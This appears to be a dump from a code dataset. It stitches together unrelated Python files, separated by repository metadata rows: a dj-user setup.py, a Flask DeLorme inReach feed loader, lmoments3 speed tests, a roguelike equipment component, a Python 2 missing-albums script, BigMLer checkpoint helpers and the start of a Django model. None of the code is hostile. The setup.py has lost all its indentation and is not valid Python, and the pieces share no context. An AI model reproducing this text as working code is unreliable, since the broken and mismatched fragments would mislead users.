# Distributed under the MIT/X11 software license, see the accompanying
# file LICENSE or http://www.opensource.org/licenses/mit-license.php.
from distutils.core import setup
from dj_user import get_version
# Compile the list of packages available, because distutils doesn't have an
# easy way to do this.
import os
packages, data_files = [], []
root_dir = os.path.dirname(__file__)
if root_dir:
os.chdir(root_dir)
for dirpath, dirnames, filenames in os.walk('dj_user'):
# Ignore dirnames that start with '.'
for i, dirname in enumerate(dirnames):
if dirname.startswith('.'): del dirnames[i]
if '__init__.py' in filenames:
pkg = dirpath.replace(os.path.sep, '.')
if os.path.altsep:
pkg = pkg.replace(os.path.altsep, '.')
packages.append(pkg)
elif filenames:
# Strip “dj_user/” or “dj_user\”:
prefix = dirpath[len('dj_user')+1:]
for f in filenames:
data_files.append(os.path.join(prefix, f))
version = get_version().replace(' ', '-')
setup(name='dj-user',
version=version,
description=(
u"Provides batteries-included backends for django.contrib.auth and "
u"django-registration."),
author='Mark Friedenbach',
author_email='mark@monetize.io',
url='http://github.com/monetizeio/dj-user/',
download_url='http://pypi.python.org/packages/source/d/dj-user/dj-user-%s.tar.gz' % version,
package_dir={'dj_user': 'dj_user'},
packages=packages,
package_data={'dj_user': data_files},
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules',
],
install_requires=(
'Django>=1.5',
'django-crispy-forms>=1.4.0',
'django-registration>=1.0',
),
)
| lgpl-3.0 | -7,464,357,450,241,061,000 | 34.372881 | 96 | 0.632487 | false | 3.610727 | false | false | false |
myadventure/myadventure-api | app/views/delorme.py | 1 | 5423 | """
Adventure DeLorme inReach controller: loads tracker and message points from a
DeLorme KML feed and manages the feed configuration for an adventure.
"""
import logging
import urllib.request, urllib.error, urllib.parse
import datetime
from pykml import parser
from flask import Blueprint, abort, request, jsonify
from werkzeug.exceptions import BadRequest
from app.decorators import crossdomain
from app.views.auth import OAUTH
from app.models.adventure import Adventure
from app.models.delorme import Delorme
from app.models.point import Point
MOD_DELORME = Blueprint('delorme', __name__, url_prefix='/api/v1/adventure/<slug>/delorme')
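# load_data() below expects DeLorme inReach KML placemarks shaped roughly like
# this (illustrative sample values; the Data names match the ExtendedData keys
# parsed, and coordinates are longitude,latitude,altitude):
#   <Placemark>
#     <TimeStamp><when>2016-01-01T12:00:00Z</when></TimeStamp>
#     <ExtendedData>
#       <Data name="Id"><value>12345</value></Data>
#       <Data name="Event"><value>Tracking interval received.</value></Data>
#       <Data name="Elevation"><value>1200 m</value></Data>
#       <Data name="Velocity"><value>5 km/h</value></Data>
#       <Data name="Course"><value>90 deg</value></Data>
#       <Data name="Text"><value>Optional message text</value></Data>
#     </ExtendedData>
#     <Point><coordinates>-120.5,38.2,0</coordinates></Point>
#   </Placemark>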
def load_data(feed_url, adventure):
"""Load DeLorme inReach data from specified feed URL."""
obj = urllib.request.urlopen(feed_url)
root = parser.parse(obj).getroot()
for placemark in root.Document.Folder.Placemark:
try:
point = None
extended_data = placemark.ExtendedData.Data
delorme_id = None
event = None
altitude = None
velocity = None
course = None
text = None
desc = None
point_type = 'tracker'
for data in extended_data:
if data.attrib['name'] == 'Id':
delorme_id = int(data.value.text)
elif data.attrib['name'] == 'Event':
event = data.value.text.encode('utf-8')
elif data.attrib['name'] == 'Elevation':
altitude = data.value.text.encode('utf-8')
elif data.attrib['name'] == 'Velocity':
velocity = data.value.text.encode('utf-8')
elif data.attrib['name'] == 'Course':
course = data.value.text.encode('utf-8')
elif data.attrib['name'] == 'Text':
text = data.value.text
if text is not None:
text = text.encode('utf-8')
if delorme_id is not None:
point = adventure.points.filter( \
point_type=point_type, delorme_id=delorme_id \
).first()
if point is None:
title = event
coordinates = placemark.Point.coordinates.text.split(',')
latitude = float(coordinates[1])
longitude = float(coordinates[0])
timestamp = datetime.datetime.strptime( \
placemark.TimeStamp.when.text, "%Y-%m-%dT%H:%M:%SZ" \
)
if text is not None:
desc = text
point_type = 'message'
point = Point(
title=title,
desc=desc,
altitude=altitude,
speed=velocity,
direction=course,
latitude=latitude,
longitude=longitude,
resource=None,
point_type=point_type,
timestamp=timestamp,
delorme_id=delorme_id,
aio_id=None,
hide=False,
thumb=None,
photo=None,
video=None,
battery=None,
source='delorme',
user=None
)
adventure.points.append(point)
adventure.save()
except AttributeError as err:
            if 'no such child' not in str(err):  # Py3 exceptions have no .message
logging.error(err)
return abort(500)
return jsonify({'status': 'ok'})
@MOD_DELORME.route('/', methods=['POST'])
@crossdomain(origin='*')
@OAUTH.require_oauth('email')
def add_delorme(slug):
"""Add Delorme inReach feed URL to Adventure object defined by slug"""
try:
adventure = Adventure.objects.get(slug=slug)
feed_url = request.values.get('feed_url', None)
adventure.delorme = Delorme(
feed_url=feed_url
)
adventure.save()
return jsonify({'delorme': adventure.delorme.to_dict()})
except TypeError as err:
logging.error(err)
abort(400)
except BadRequest:
abort(400)
return
@MOD_DELORME.route('/', methods=['GET'])
@crossdomain(origin='*')
@OAUTH.require_oauth('email')
def get_delorme(slug):
"""Get Delorme inReach information."""
try:
adventure = Adventure.objects.get(slug=slug)
if adventure.delorme:
return jsonify({'delorme': adventure.delorme.to_dict()})
return jsonify({'error': 'DeLorme inReach information is not configured.'}), 400
except TypeError as err:
logging.error(err)
abort(400)
except BadRequest:
abort(400)
return
@MOD_DELORME.route('/', methods=['DELETE'])
@crossdomain(origin='*')
@OAUTH.require_oauth('email')
def delete_point(slug):
"""Delete DeLorme inReach information."""
Adventure.objects(slug=slug).update(unset__delorme=1, upsert=True)
return jsonify({'status': 'ok'})
@MOD_DELORME.route('/load', methods=['GET'])
@OAUTH.require_oauth('email')
def load_tracker(slug):
"""Load DeLorme inReach tracker points from configured feed URL."""
adventure = Adventure.objects(slug=slug).get()
delorme = adventure.delorme
if delorme.feed_url is not None:
return load_data(delorme.feed_url, adventure)
return jsonify({'error': 'DeLorme inReach information is not set.'}), 400
| apache-2.0 | 7,527,526,077,902,378,000 | 33.322785 | 91 | 0.551724 | false | 4.047015 | false | false | false |
OpenHydrology/lmoments3 | lmoments3/tests/test_samlmu_speed.py | 1 | 1493 | import unittest
from datetime import datetime
import lmoments3 as lm
from lmoments3 import distr
import numpy as np
class TestSamlmuSpeed(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.n = 50
kappa_distr = distr.kap(loc=-0.7, scale=2.6, k=0.9, h=1.6)
cls.record = kappa_distr.ppf(np.random.random(cls.n * 10000))
def setUp(self):
self.start_time = datetime.now()
def tearDown(self):
duration = datetime.now() - self.start_time
print("Test {} ran for {} s.".format(self.id(), duration.total_seconds()))
def test_n50_nmom3(self):
start_i = 0
for i in range(10000):
l1, l2, t3 = lm.lmom_ratios(self.record[start_i:start_i + self.n], nmom=3)
t2 = l2 / l1
start_i += self.n
def test_n50_nmom4(self):
start_i = 0
for i in range(10000):
l1, l2, t3, t4 = lm.lmom_ratios(self.record[start_i:start_i + self.n], nmom=4)
t2 = l2 / l1
start_i += self.n
class TestKappaSpeed(unittest.TestCase):
def setUp(self):
self.start_time = datetime.now()
def tearDown(self):
duration = datetime.now() - self.start_time
print("Test {} ran for {} s.".format(self.id(), duration.total_seconds()))
def test_n50(self):
n = 50
kappa_distr = distr.kap(loc=-0.7, scale=2.6, k=0.9, h=1.6)
for i in range(10000):
record = kappa_distr.ppf(np.random.random(n)) | gpl-3.0 | -230,801,476,502,980,300 | 29.489796 | 90 | 0.58138 | false | 3.016162 | true | false | false |
jpalladino84/Python-Roguelike-Framework | components/equipment.py | 2 | 4828 | from components.component import Component
from stats.enums import StatsEnum
from itertools import chain
from util.decorators import cached, invalidate_cache
class Equipment(Component):
NAME = "equipment"
"""
    This component attaches itself to anything with a body.
    It represents the equipment worn or wielded by that body.
"""
def __init__(self):
super().__init__()
self.host_body = None
self.worn_equipment_map = {}
self.wielded_equipment_map = {}
def copy(self):
# TODO Copying an equipment to another type of body would require some sort of validation.
# TODO Removing or dropping invalid mappings.
new_equipment = Equipment()
new_equipment.host_body = self.host_body
new_equipment.worn_equipment_map = self.__copy_all_items(self.worn_equipment_map)
new_equipment.wielded_equipment_map = self.__copy_all_items(self.wielded_equipment_map)
return new_equipment
    @staticmethod
    def __copy_all_items(collection):
        # Deep-copy a mapping of body part -> equipped item(s). Iterating the
        # dict with enumerate() would yield (index, key) pairs, so walk
        # items() instead; worn slots hold lists, wielded slots single items.
        collection_copy = collection.copy()
        for key, value in collection.items():
            if isinstance(value, list):
                collection_copy[key] = [item.copy() for item in value]
            else:
                collection_copy[key] = value.copy()
        return collection_copy
def on_register(self, host):
super().on_register(host)
self.host_body = host.body
@invalidate_cache
def wear(self, item):
# Wearing requires the bodypart to be compatible with the item
if not self.host_body:
self.host_body = self.host.body
if item.armor:
armor = item.armor
if item.stats.get_current_value(StatsEnum.Size) == self.host.stats.get_current_value(StatsEnum.Size):
for compatible_bodypart_uid in armor.wearable_body_parts_uid:
host_body_parts = self.host_body.get_body_parts(compatible_bodypart_uid)
for host_body_part in host_body_parts:
if host_body_part:
if host_body_part in self.worn_equipment_map:
if armor.worn_layer not in [item.armor.worn_layer for item in
self.worn_equipment_map[host_body_part]]:
self.worn_equipment_map[host_body_part].append(item)
return True
else:
self.worn_equipment_map[host_body_part] = [item]
return True
return False
@invalidate_cache
def wield(self, item):
if not self.host_body:
self.host_body = self.host.body
# Wielding requires bodyparts with GRASP
grasp_able_body_parts = self.host_body.get_grasp_able_body_parts()
# Wielding with one hand gets priority
two_hands_wielders = []
for grasp_able_body_part in grasp_able_body_parts:
if grasp_able_body_part in self.wielded_equipment_map:
continue
# 10 is the normal relative_size for a hand
relative_size_modifier = grasp_able_body_part.relative_size - 10
relative_size_modifier = round(relative_size_modifier / 10) if relative_size_modifier else 0
relative_size = self.host.stats.get_current_value(StatsEnum.Size) + relative_size_modifier
item_size = int(item.stats.get_current_value(StatsEnum.Size))
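            # Worked example (illustrative numbers): a host of Size 5 with a
            # normal hand (relative_size 10 -> modifier 0) gives relative_size
            # 5, so items of size 3-5 take the one-handed branch below and
            # sizes 6-7 fall through to the two-handed branch.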
if relative_size >= item_size >= relative_size - 2:
# Can be wielded in one "hands"
self.wielded_equipment_map[grasp_able_body_part] = item
return True
elif relative_size < item_size <= relative_size + 2:
# Can be wielded in two "hands"
two_hands_wielders.append(grasp_able_body_part)
if len(two_hands_wielders) >= 2:
first_wield = two_hands_wielders[0]
second_wield = two_hands_wielders[1]
self.wielded_equipment_map[first_wield] = item
self.wielded_equipment_map[second_wield] = item
return True
return False
@cached
def get_worn_items(self):
return [item for item_list in self.worn_equipment_map.values() for item in item_list]
@cached
def get_load_of_worn_items(self):
worn_items = self.get_worn_items()
total_weight = 0.0
for item in worn_items:
item_weight = item.stats.get_current_value(StatsEnum.Weight)
material_modifier = item.material.weight
total_weight += item_weight * material_modifier
return total_weight
@cached
def get_wielded_items(self):
return [item for item in self.wielded_equipment_map.values()]
| mit | 8,653,732,156,884,264,000 | 39.915254 | 113 | 0.594863 | false | 3.85623 | false | false | false |
palfrey/missing-albums | missing_albums.py | 1 | 12337 | from mutagen import File
from mutagen.asf import ASF, ASFTags
from mutagen.apev2 import APEv2File
from mutagen.flac import FLAC
from mutagen.id3 import ID3FileType
from mutagen.easyid3 import EasyID3
from mutagen.mp3 import MP3
from mutagen.oggflac import OggFLAC
from mutagen.oggspeex import OggSpeex
from mutagen.oggtheora import OggTheora
from mutagen.oggvorbis import OggVorbis
from mutagen.trueaudio import TrueAudio
from mutagen.wavpack import WavPack
from mutagen.mp4 import MP4, MP4Tags
from mutagen.musepack import Musepack
from mutagen.monkeysaudio import MonkeysAudio
from mutagen.optimfrog import OptimFROG
import amazon
import logging
import musicbrainz2.webservice as ws
import musicbrainz2.model as m
import sqlite3
from os import walk
from os.path import splitext,join, abspath
import sys
from time import sleep, strptime, struct_time, localtime
from types import IntType
import math
import codecs
from genshi.template import NewTextTemplate
from os import mkdir
from os.path import exists
from optparse import OptionParser
from ConfigParser import ConfigParser
parser = OptionParser()
parser.add_option("-m","--music-dir",dest="directory",default=".",help="Pick music files directory. Default is current directory")
parser.add_option("-d","--database",dest="db", default="songs.db",help="Songs database file")
parser.add_option("--overrides", dest="overrides", default=None, help="Overrides info file")
parser.add_option("--no-walk",dest="walk",default="True",action="store_false",help="Don't re-read music directory")
parser.add_option("--artists-only", dest="artistsOnly", default="False", action="store_true", help="Write out simplified artists list")
(opts,args) = parser.parse_args()
overrides = {"artist": {}, "ignore": {}}
if opts.overrides != None:
cp = ConfigParser()
cp.read([opts.overrides])
for section in cp.sections():
if section == "artist":
overrides["artist"] = dict(cp.items(section))
elif section == "ignore":
overrides["ignore"] = cp.options(section)
else:
raise Exception, section
class EasyMP3(MP3):
def __init__(self, *args, **kwargs):
kwargs['ID3'] = EasyID3
MP3.__init__(self,*args, **kwargs)
class EasierTags:
def __getitem__(self, key):
if key in self.simpler.keys():
return self._parent.__getitem__(self,self.simpler[key])
else:
return self._parent.__getitem__(self, key)
class EasyMP4Tags(MP4Tags, EasierTags):
simpler = {"title":"\xa9nam","artist":"\xa9ART","album":"\xa9alb"}
class EasyMP4(MP4):
def load(self, filename):
MP4.load(self,filename)
self.tags.__class__ = EasyMP4Tags
class EasyASFTags(EasierTags, ASFTags):
_parent = ASFTags
simpler = {"title":"Title"}
class EasyASF(ASF):
def load(self, filename):
ASF.load(self,filename)
self.tags.__class__ = EasyASFTags
options = [EasyMP3, TrueAudio, OggTheora, OggSpeex, OggVorbis, OggFLAC,
FLAC, APEv2File, EasyMP4, ID3FileType, WavPack, Musepack,
MonkeysAudio, OptimFROG, EasyASF]
doregen = True
con = sqlite3.connect(opts.db)
cur = con.cursor()
cur.execute("select name from sqlite_master where type='table' and name='songs'")
if len(cur.fetchall())==0:
cur.execute("create table songs (fullpath text(300) primary key, artist text(100),album text(100),title text(100),duration integer);")
con.commit()
if opts.walk:
for path, dirs, files in walk(opts.directory):
for f in files:
if f[0] == ".":
continue # ignore hidden files
try:
fp = unicode(abspath(join(path,f)),"utf_8","ignore")
except UnicodeDecodeError:
print type(join(path,f)),path,f
raise
cur.execute("select artist,album,title,duration from songs where fullpath=?", (fp,))
d = cur.fetchall()
if d==[]:
try:
data = File(fp, options=options)
except IOError,e:
print e
print "rebuilding song db"
data = None
if data == None:
cur.execute("insert into songs (fullpath,duration) values(?,?)",(fp, -1))
con.commit()
continue
try:
try:
artist = data["artist"][0].strip()
except KeyError:
artist = unicode("")
try:
album = data["album"][0].strip()
except KeyError:
album = unicode("")
try:
title = data["title"][0].strip()
except KeyError:
title = unicode("")
duration = int(data.info.length)
print (fp, artist, album, title, duration)
cur.execute("insert into songs values(?,?,?,?,?)",(fp, artist, album, title, duration))
con.commit()
except KeyError:
print fp,data.keys()
raise
cur.execute("select artist,album, count(title) from songs group by artist,album having count(title)>2 and artist!=\"\"")
artists = {}
lower = {}
d = cur.fetchall()
#print d
for (artist, album,title) in d:
if artist.lower() in lower:
artist = lower[artist.lower()]
if artist not in artists:
artists[artist] = {}
lower[artist.lower()] = artist
artists[artist][album] = title
#print artists.keys()
logging.basicConfig()
logger = logging.getLogger()
#logger.setLevel(logging.DEBUG)
def getAlbums(artist):
cur.execute("select album, asin, date, ep from musicbrainz where artist=?", (artist,))
d = cur.fetchall()
if d == []:
q = ws.Query()
f = ws.ArtistFilter(query=artist, limit=5)
while True:
try:
artistResults = q.getArtists(f)
break
except BaseException, e:
print "problem during artist name", e
sleep(5)
ret = {}
for artistResult in artistResults:
print "name", artistResult.artist.name
artist_id = artistResult.artist.id
release_ids = []
for kind in (m.Release.TYPE_ALBUM, m.Release.TYPE_EP, m.Release.TYPE_SOUNDTRACK, m.Release.TYPE_LIVE):
while True:
try:
# The result should include all official albums.
#
inc = ws.ArtistIncludes(
releases=(m.Release.TYPE_OFFICIAL, kind),
tags=True)
release_ids.extend([(x.id,kind) for x in q.getArtistById(artist_id, inc).getReleases()])
break
except BaseException, e:
print "problem during releases", e
sleep(5)
if release_ids == []:
print "No releases found for %s"%artist
continue
print "release ids", release_ids
ret = {}
lower = {}
for (id,kind) in release_ids:
inc = ws.ReleaseIncludes(artist=True, releaseEvents=True)
while True:
try:
release = q.getReleaseById(id, inc)
break
except BaseException, e:
print "problem during release", e
sleep(5)
if release.asin == None: # ignore these
print "skipping because no ASIN:", id, release.title
continue
title = release.title
if title.find("(disc ")!=-1:
title = title[:title.find("(disc ")].strip()
#assert title not in ret.keys(),(title, release)
if title.lower() in lower:
title = lower[title.lower()]
else:
lower[title.lower()] = title
ret[title] = {"when":release.getEarliestReleaseDate(), "asin":release.asin, "ep": kind == m.Release.TYPE_EP}
print "got", title
if ret == {}:
print "no usable releases"
continue
else:
break
if ret == {}:
raise Exception, "No usable albums/artists found for %s. Try fixing one of the entries marked 'skipping because no ASIN', or add to the ignore list"%artist
for title in ret:
cur.execute("insert into musicbrainz values(?, ?, ?, ?, ?)", (artist, title, ret[title]["asin"], ret[title]["when"], ret[title]["ep"]))
con.commit()
else:
ret = {}
lower = {}
for (album, asin, when, ep) in d:
if album.lower() in lower:
album = lower[album.lower()]
else:
lower[album.lower()] = album
ret[album] = {"asin":asin, "when":when, "ep": ep}
keys = ret.keys()
for title in keys:
if title.find("(")!=-1:
stripped = title[:title.find("(")].strip()
if len(stripped)>0 and stripped[-1] == ".":
stripped = stripped[:-1]
if stripped in ret.keys():
print "removed", title, stripped
del ret[title]
continue
try:
ret[title]["when"] = strptime(ret[title]["when"], "%Y-%m-%d")
except ValueError:
if ret[title]["when"].find("-")!=-1:
ret[title]["when"] = struct_time((int(ret[title]["when"][:ret[title]["when"].find("-")]),0,0,0,0,0,0,0,0))
else:
ret[title]["when"] = struct_time((int(ret[title]["when"]),0,0,0,0,0,0,0,0))
except TypeError:
if type(ret[title]["when"]) == IntType:
ret[title]["when"] = struct_time((ret[title]["when"],0,0,0,0,0,0,0,0))
elif ret[title]["when"] == None:
pass
else:
raise
return ret
most_tracks = [x for x in sorted(artists.keys(), lambda x,y:cmp(sum(artists[y].values()), sum(artists[x].values()))) if sum(artists[x].values())>3]
print most_tracks
cur.execute("select name from sqlite_master where type='table' and name='musicbrainz'")
if len(cur.fetchall())==0:
cur.execute("create table musicbrainz (artist text(100), album text(100), asin text(20), date integer, ep boolean, primary key(artist, album));")
con.commit()
cur.execute("select name from sqlite_master where type='table' and name='amazon'")
if len(cur.fetchall())==0:
cur.execute("create table amazon (artist text(100), album text(100), url text(500), image text(500), amazon_new integer, primary key(artist, album));")
con.commit()
def compact(inp):
inp = inp.lower()
return inp.replace("'","").replace(","," ").replace("&"," ").replace(":", " ").replace(".", " ")
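# e.g. compact("Sigur Ros: Takk...") -> "sigur ros  takk   " (illustrative)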
missing = {}
for artist in most_tracks:
if artist.lower() in overrides["artist"]:
newartist = overrides["artist"][artist.lower()]
artists[newartist] = artists[artist]
del artists[artist]
artist = newartist
if artist.lower() in overrides["ignore"]:
continue
print "artist",artist, type(artist), artist.encode("utf-8")
albums = getAlbums(artist)
print artist, albums.keys(), artists[artist]
newest = None
for got_a in artists[artist].keys():
use_a = None
if got_a in albums.keys():
use_a = got_a
else:
items = [x for x in compact(got_a).split() if x not in ("(ep)",)]
for k in albums.keys():
for i in items:
if i not in compact(k):
break
else:
#print "found all bits", items, k
use_a = k
break
if use_a != None:
if newest == None or newest < albums[use_a]['when']:
newest = albums[use_a]['when']
else:
print "Can't find '%s'"%got_a, albums.keys()
for a in albums.keys():
if albums[a]['when'] > newest and not albums[a]['ep']:
#print "don't have",a, albums[a]['asin'], artist
cur.execute("select url, image, amazon_new from amazon where artist=? and album=?",(artist, a))
d = cur.fetchall()
if d == []:
results = amazon.searchByTitle(artist, a)
cur.execute("insert into amazon values(?, ?, ?, ?, ?)",(artist, a, unicode(results["url"]), unicode(results["image"]), results["amazon_new"]))
con.commit()
else:
d = d[0]
def realNone(x):
if x == "None":
return None
else:
return x
d = [realNone(x) for x in d]
results = {"title":a, "url":d[0], "image":d[1], "amazon_new":d[2]}
print "missing",results, albums[a]['when'], artist
when = albums[a]['when']
if when not in missing:
missing[when] = []
results["artist"] = artist
results["when"] = when
missing[when].append(results)
#raise Exception,albums[a]
#break
artists = {}
if opts.artistsOnly:
for when in sorted(missing, reverse = True):
for m in missing[when]:
if m["artist"] not in artists:
artists[m["artist"]] = []
artists[m["artist"]].append(m["title"])
f = codecs.open("artists.txt", "wb", "utf-8")
for a in sorted(artists):
f.write(u"%s - %s\n"%(a, ", ".join(artists[a])))
f.close()
sys.exit(0)
folder = "output"
if not exists(folder):
mkdir(folder)
flattened = []
for key in sorted(missing, reverse = True):
if key > localtime(): # ignore items not released yet
continue
flattened.extend([x for x in missing[key] if x["url"]!=None])
count = len(flattened)
perpage = 10
pages = int(math.ceil(count/(perpage*1.0)))
print count, pages
links = [("1", "index.html")] + [(str(x), "index%03d.html"%x) for x in range(2, pages+1)]
for start in range(0, count, perpage):
index = (start/perpage) + 1
if index == 1:
name = "index.html"
else:
name = "index%03d.html"%index
print flattened[start:start+perpage]
nt = NewTextTemplate(file("template.html").read())
open(join(folder,name), "wb").write(nt.generate(albums = flattened[start:start+perpage], links = links, index = str(index)).render())
| agpl-3.0 | -8,553,838,431,859,450,000 | 29.017032 | 158 | 0.656156 | false | 3.023775 | false | false | false |
brokendata/bigmler | bigmler/checkpoint.py | 1 | 12195 | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 BigML
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Checkpoint functions for BigMLer
"""
from __future__ import absolute_import
import os
import bigml.api
from bigml.util import console_log
from bigmler.utils import log_message
def is_source_created(path, suffix=""):
"""Checks existence and reads the source id from the source file in the
path directory
"""
source_id = None
try:
with open("%s%ssource%s" % (path, os.sep, suffix)) as source_file:
source_id = source_file.readline().strip()
try:
source_id = bigml.api.get_source_id(source_id)
return True, source_id
except ValueError:
return False, None
except IOError:
return False, None
def is_dataset_created(path, suffix=""):
"""Checks existence and reads the dataset id from the dataset file in
the path directory
"""
dataset_id = None
try:
with open("%s%sdataset%s" % (path, os.sep, suffix)) as dataset_file:
dataset_id = dataset_file.readline().strip()
try:
dataset_id = bigml.api.get_dataset_id(dataset_id)
return True, dataset_id
except ValueError:
return False, None
except IOError:
return False, None
def are_datasets_created(path, number_of_datasets, suffix='parts'):
"""Checks existence and reads the dataset ids from the datasets file in
the path directory
"""
dataset_ids = []
try:
with open("%s%sdataset_%s" % (path, os.sep, suffix)) as datasets_file:
for line in datasets_file:
dataset = line.strip()
try:
dataset_id = bigml.api.get_dataset_id(dataset)
dataset_ids.append(dataset_id)
except ValueError:
return False, dataset_ids
if len(dataset_ids) == number_of_datasets:
return True, dataset_ids
else:
return False, dataset_ids
except IOError:
return False, dataset_ids
def are_models_created(path, number_of_models):
"""Checks existence and reads the model ids from the models file in the
path directory
"""
model_ids = []
try:
with open("%s%smodels" % (path, os.sep)) as models_file:
for line in models_file:
model = line.strip()
try:
model_id = bigml.api.get_model_id(model)
model_ids.append(model_id)
except ValueError:
return False, model_ids
if len(model_ids) == number_of_models:
return True, model_ids
else:
return False, model_ids
except IOError:
return False, model_ids
def are_predictions_created(predictions_file, number_of_tests):
"""Checks existence and reads the predictions from the predictions file in
the path directory
"""
predictions = file_number_of_lines(predictions_file)
if predictions != number_of_tests:
os.remove(predictions_file)
return False, None
return True, None
def is_evaluation_created(path):
"""Checks existence and reads the evaluation id from the evaluation file
in the path directory
"""
evaluation_id = None
try:
with open("%s%sevaluation" % (path, os.sep)) as evaluation_file:
evaluation_id = evaluation_file.readline().strip()
try:
evaluation_id = bigml.api.get_evaluation_id(evaluation_id)
return True, evaluation_id
except ValueError:
return False, None
except IOError:
return False, None
def are_evaluations_created(path, number_of_evaluations):
"""Checks existence and reads the evaluation ids from the evaluations file
in the path directory and checks the corresponding evaluations
"""
evaluation_ids = []
try:
with open("%s%sevaluations" % (path, os.sep)) as evaluations_file:
for line in evaluations_file:
evaluation = line.strip()
try:
evaluation_id = bigml.api.get_evaluation_id(evaluation)
evaluation_ids.append(evaluation_id)
except ValueError:
return False, evaluation_ids
if len(evaluation_ids) == number_of_evaluations:
return True, evaluation_ids
else:
return False, evaluation_ids
except IOError:
return False, evaluation_ids
def are_ensembles_created(path, number_of_ensembles):
"""Checks and reads the ensembles ids from the ensembles file in the
path directory
"""
ensemble_ids = []
try:
with open("%s%sensembles" % (path, os.sep)) as ensembles_file:
for line in ensembles_file:
ensemble = line.strip()
try:
ensemble_id = bigml.api.get_ensemble_id(ensemble)
ensemble_ids.append(ensemble_id)
except ValueError:
return False, ensemble_ids
if len(ensemble_ids) == number_of_ensembles:
return True, ensemble_ids
else:
return False, ensemble_ids
except IOError:
return False, ensemble_ids
def checkpoint(function, *args, **kwargs):
"""Redirects to each checkpoint function
"""
common_parms = ['debug', 'message', 'log_file', 'console']
debug = kwargs.get('debug', False)
message = kwargs.get('message', None)
log_file = kwargs.get('log_file', None)
console = kwargs.get('console', False)
f_kwargs = {key: value for key, value in kwargs.items()
if not key in common_parms}
result = function(*args, **f_kwargs)
if debug:
console_log("Checkpoint: checking %s with args:\n%s\n\nResult:\n%s\n" %
(function.__name__, "\n".join([repr(arg) for arg in args]),
repr(result)))
# resume is the first element in the result tuple
if not result[0] and message is not None:
log_message(message, log_file=log_file, console=console)
return result
def file_number_of_lines(file_name):
"""Counts the number of lines in a file
"""
try:
item = (0, None)
with open(file_name) as file_handler:
for item in enumerate(file_handler):
pass
return item[0] + 1
except IOError:
return 0
def is_batch_prediction_created(path):
"""Checks existence and reads the batch prediction id from the
batch_prediction file in the path directory
"""
batch_prediction_id = None
try:
with open("%s%sbatch_prediction"
% (path, os.sep)) as batch_prediction_file:
batch_prediction_id = batch_prediction_file.readline().strip()
try:
batch_prediction_id = bigml.api.get_batch_prediction_id(
batch_prediction_id)
return True, batch_prediction_id
except ValueError:
return False, None
except IOError:
return False, None
def is_batch_centroid_created(path):
"""Checks existence and reads the batch centroid id from the
batch_centroid file in the path directory
"""
batch_centroid_id = None
try:
with open("%s%sbatch_centroid"
% (path, os.sep)) as batch_prediction_file:
batch_centroid_id = batch_prediction_file.readline().strip()
try:
batch_centroid_id = bigml.api.get_batch_centroid_id(
batch_centroid_id)
return True, batch_centroid_id
except ValueError:
return False, None
except IOError:
return False, None
def are_clusters_created(path, number_of_clusters):
"""Checks existence and reads the cluster ids from the clusters file in the
path directory
"""
cluster_ids = []
try:
with open("%s%sclusters" % (path, os.sep)) as clusters_file:
for line in clusters_file:
cluster = line.strip()
try:
cluster_id = bigml.api.get_cluster_id(cluster)
cluster_ids.append(cluster_id)
except ValueError:
return False, cluster_ids
if len(cluster_ids) == number_of_clusters:
return True, cluster_ids
else:
return False, cluster_ids
except IOError:
return False, cluster_ids
def is_dataset_exported(filename):
"""Checks the existence of the CSV exported dataset file
"""
try:
with open(filename):
return True
except IOError:
return False
def is_batch_anomaly_score_created(path):
"""Checks existence and reads the batch anomaly score id from the
batch_anomaly_score file in the path directory
"""
batch_anomaly_score_id = None
try:
with open("%s%sbatch_anomaly_score"
% (path, os.sep)) as batch_prediction_file:
batch_anomaly_score_id = batch_prediction_file.readline().strip()
try:
batch_anomaly_score_id = bigml.api.get_batch_anomaly_score_id(
batch_anomaly_score_id)
return True, batch_anomaly_score_id
except ValueError:
return False, None
except IOError:
return False, None
def are_anomalies_created(path, number_of_anomalies):
"""Checks existence and reads the anomaly detector ids from the
anomalies file in the path directory
"""
anomaly_ids = []
try:
with open("%s%sanomalies" % (path, os.sep)) as anomalies_file:
for line in anomalies_file:
anomaly = line.strip()
try:
anomaly_id = bigml.api.get_anomaly_id(anomaly)
anomaly_ids.append(anomaly_id)
except ValueError:
return False, anomaly_ids
if len(anomaly_ids) == number_of_anomalies:
return True, anomaly_ids
else:
return False, anomaly_ids
except IOError:
return False, anomaly_ids
def is_project_created(path):
"""Checks existence and reads project id from the
project file in the path directory
"""
project_id = None
try:
with open("%s%sproject"
% (path, os.sep)) as project_file:
project_id = project_file.readline().strip()
try:
project_id = bigml.api.get_project_id(
project_id)
return True, project_id
except ValueError:
return False, None
except IOError:
return False, None
def are_samples_created(path, number_of_samples):
"""Checks existence and reads the samples ids from the samples file in the
path directory
"""
sample_ids = []
try:
with open("%s%ssamples" % (path, os.sep)) as samples_file:
for line in samples_file:
sample = line.strip()
try:
sample_id = bigml.api.get_sample_id(sample)
sample_ids.append(sample_id)
except ValueError:
return False, sample_ids
if len(sample_ids) == number_of_samples:
return True, sample_ids
else:
return False, sample_ids
except IOError:
return False, sample_ids
| apache-2.0 | -7,124,479,175,667,289,000 | 30.757813 | 79 | 0.581058 | false | 4.294014 | false | false | false |
pavanw3b/sh00t | configuration/models.py | 1 | 3058 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
from datetime import datetime
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class MethodologyMaster(models.Model):
name = models.CharField(max_length=100)
description = models.TextField(default="")
order = models.IntegerField(default=0)
created_by = models.ForeignKey(User, related_name="methodology_created_by", null=True, on_delete=models.CASCADE)
created = models.DateTimeField(default=datetime.now)
updated_by = models.ForeignKey(User, related_name="methodology_updated_by", null=True, on_delete=models.CASCADE)
updated = models.DateTimeField(default=datetime.now)
def __str__(self): # __unicode__ on Python 2
return self.name
